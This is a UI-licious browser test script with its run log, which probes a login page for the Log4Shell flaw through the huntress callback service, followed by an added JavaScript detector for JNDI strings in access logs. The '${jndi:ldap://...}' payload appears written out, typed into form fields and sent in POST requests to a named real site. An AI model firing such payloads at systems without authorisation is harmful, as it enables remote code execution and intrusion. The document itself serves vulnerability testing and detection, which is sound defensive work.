//
// Change this to the site you wish to test against.
// As mentioned on huntress Log4Shell, a negative test does
// NOT mean that your site is not vulnerable.
//
// While this script is meant to be generic, you can modify
// it to be specific to your login page manually if needed.
//
// See: https://log4shell.huntress.com/
//
// Note: this script was last updated 14th Dec 2021
//
// !!! MODIFY THE SITE URL HERE (phptravels is a dummy testing site)
let testSite = "https://glints.com/sg"

//------------------------------------------------------------------------
TEST.log.info("DISCLAIMER: Your site is not guaranteed to be safe if this test passes; it only means you are definitely vulnerable if it fails - see: https://log4shell.huntress.com/ for more info.")
TEST.log.info("This test snippet/test function should ONLY be used against sites you are permitted to test against")

// Function which helps make this test easily reusable across multiple URLs
function testWebsiteForLog4Shell(testURL) {
    // Let's get the log4shell test token
    I.goTo("https://log4shell.huntress.com/")
    let log4shell_id = I.getText("/html/body/main/div/p[5]/code")
    let log4shell_str = "${jndi:ldap://log4shell.huntress.com:1389/" + log4shell_id + "}";
    TEST.log.info("Log4Shell Test ID: " + log4shell_id)

    // Let's go to the target site, and test it
    I.goTo(testURL)

    //------------------------------------------------------------------------
    //--------------------------
    // Use and modify this login script specific to your site use case
    // if the automatic one does not work
    //--------------------------
    // I.fill("Username", log4shell_str);
    // I.fill("Password", log4shell_str);

    // (the remaining steps of this function are cut off on this page;
    //  the run log below records what they do)
}

testWebsiteForLog4Shell(testSite)
SUCCESS!
1m 22s (22s)
1. [start of test]
2. DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.
3. This test snippet/test function should ONLY be used against sites you are permitted to test against
4. I go to "https://log4shell.huntress.com/"  (1.3s)
5. I get text from "/html/body/main/div/p[5]/code"  (0.1s)
6. Log4Shell Test ID: 803b16b7-56eb-49ba-97dc-b492f88b9220
7. I go to "https://glints.com/sg"  (5.1s)
8. I click "Login"
9. I click "Password"
10. I fill "Password": "${jndi:ldap://log4shell.huntress.com:1389/803b16b7-56eb-49ba-97dc-b492f88b9220}"  (2.5s)
11. I click "Email"
12. I fill "Email": "${jndi:ldap://log4shell.huntress.com:1389/803b16b7-56eb-49ba-97dc-b492f88b9220}"  (2.9s)
13. I click "Login"
14. I wait for 5s  (5.0s)
15. POST https://glints.com/sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D  (3.4s)
    Info: 404
16. POST https://glints.com/sg/api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D  (0.8s)
    Info: 404
17. POST api.https://glints.com/sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D
    Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://glints.com/sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D'.
18. POST api.https://glints.com/sg/api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D
    Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://glints.com/sg/api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D'.
19. I go to "https://log4shell.huntress.com/view/803b16b7-56eb-49ba-97dc-b492f88b9220"  (1.0s)
20. GET https://log4shell.huntress.com/json/803b16b7-56eb-49ba-97dc-b492f88b9220  (0.1s)
21. No active Log4Shell exploit found
22. [end of test]
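The run log above records the probe string both as typed into form fields and percent-encoded inside POST query strings, which is exactly how it shows up in a web server's access log on the receiving side. As an added example (not part of the original UI-licious script or the huntress service), here is a small detector a defender can run over access-log lines: it URL-decodes each line (bounded, so double-encoded forms are still caught), matches the `${jndi:...}` lookup, and pulls out the scheme, callback host:port and per-probe token for correlation. The sample log lines, client IPs and the `example.invalid` host are constructed for this example; the token is the one the run log above reports.

```javascript
// Added example (not part of the original UI-licious test script): a small
// detector for Log4Shell-style JNDI lookup strings in web-server access logs.
// The run log above shows the probe percent-encoded inside a POST query string,
// so each line is URL-decoded before matching. Sample log lines are constructed
// for this example; the client IPs are documentation-range placeholders.

// Matches "${jndi:<scheme>://<host[:port]>/<path>}" after decoding.
const JNDI_RE = /\$\{jndi:([a-z]+):\/\/([^/}]+)\/([^}]*)\}/i;

// Percent-decode repeatedly (bounded) so a double-encoded payload is still seen;
// a malformed %-sequence stops decoding and the last good form is kept.
function fullyDecode(s) {
  let prev = null;
  let cur = s;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur);
    } catch (e) {
      break; // malformed %-sequence: keep what we have
    }
  }
  return cur;
}

// Returns null for a clean line, or a finding with the pieces a responder
// wants to correlate: the lookup scheme, the callback host:port and the
// per-probe token (the huntress service keys its results on that token).
function scanLine(line) {
  const m = JNDI_RE.exec(fullyDecode(line));
  if (!m) return null;
  return { scheme: m[1].toLowerCase(), hostPort: m[2], token: m[3], match: m[0] };
}

// Scan a list of log lines; each finding carries its 1-based line number.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const f = scanLine(line);
    if (f) findings.push({ lineNo: idx + 1, ...f });
  });
  return findings;
}

// Constructed sample access-log lines (combined-log style). Line 2 carries the
// same percent-encoded probe the run log above records; line 4 carries it
// unencoded in the logged User-Agent field, so header-borne copies are seen too.
const SAMPLE_LOG = [
  '203.0.113.5 - - [14/Dec/2021:10:00:01 +0000] "GET /sg HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [14/Dec/2021:10:00:05 +0000] "POST /sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [14/Dec/2021:10:00:07 +0000] "GET /sg/api HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [14/Dec/2021:10:00:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "${jndi:ldap://log4shell.huntress.com:1389/803b16b7-56eb-49ba-97dc-b492f88b9220}"',
];

// Stand-alone run: print one JSON finding per line.
for (const f of scanLog(SAMPLE_LOG)) {
  console.log(JSON.stringify(f));
}
```

Feed it real lines with `fs.readFileSync(path, 'utf8').split('\n')`; a finding whose token matches one of your own authorised test runs (as in the log above) is expected, while any other token or callback host is worth an incident ticket regardless of whether the huntress page reported a hit, since the run log itself says a negative result does not prove the site safe.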